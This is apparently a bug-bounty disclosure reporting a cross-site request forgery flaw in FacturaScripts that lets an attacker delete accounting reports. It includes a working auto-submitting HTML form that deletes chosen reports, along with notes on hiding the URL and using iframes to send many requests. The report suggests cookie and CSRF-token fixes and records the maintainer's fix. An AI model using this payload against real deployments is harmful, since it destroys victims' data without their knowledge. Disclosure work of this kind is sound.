Cross-Site Request Forgery (CSRF) in neorazorx/facturascripts


Reported on

Aug 23rd 2021

✍️ Description

Attacker able to delete any number of Accounting Reports with CSRF attack.

It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.

In CSRF attacks it is necessary that a user logged into your application and just going to a malicious website and after that only with a redirection attacker can perform attack on unprotected endpoint, this means only with visiting a site a unwanted action will be perform without that user aware from that.

Or users with low level privilege can send a link to other users and admins with higher privilege and then their malicious request will be executed without that victim users and admins be aware about that.

🕵️‍♂️ Proof of Concept

1.First of all admin or user with right privileges already should be logged in Browser.

2.Open the PoC.html (it is auto-submit).

3.Here three Reports with code[] 2,3,4 will be deleted after the PoC.html file opened.

// PoC.html

<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/invoices/ListReportAccounting?activetab=ListReportLedger" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="activetab" value="ListReportLedger" />
<input type="hidden" name="loadfilter" value="0" />
<input type="hidden" name="offset" value="0" />
<input type="hidden" name="order" value="0" />
<input type="hidden" name="query" value="" />
<input type="hidden" name="filteridcompany" value="" />
<input type="hidden" name="filterchannel" value="" />
<input type="hidden" name="code&#91;&#93;" value="2" />
<input type="hidden" name="code&#91;&#93;" value="3" />
<input type="hidden" name="code&#91;&#93;" value="4" />
<input type="submit" value="Submit request" />

This PoC can perform attack without that users noticed and Also PoC can send multiple request at same time that means attacker can Bruteforce all possible actions ( with using multiple Iframe )

💥 Impact

This vulnerability is capable of make high damage of availability of system.


The easiest way that you set strict attribute on each cookie, Or you set Lax and Use GET requests only for receiving data not changing them.

The best way is that you set a CSRF token in each endpoint. 📍 Location index.php#L1

Am modified the report
3 years ago
3 years ago

Hey amammad, I've contacted the repo's maintainer via the email provided for you.

We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back 3 years ago
Carlos Garcia validated this vulnerability 2 years ago
am0o0 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Carlos Garcia marked this as fixed with commit 8e2c15 2 years ago
The fix bounty has been dropped
to join this conversation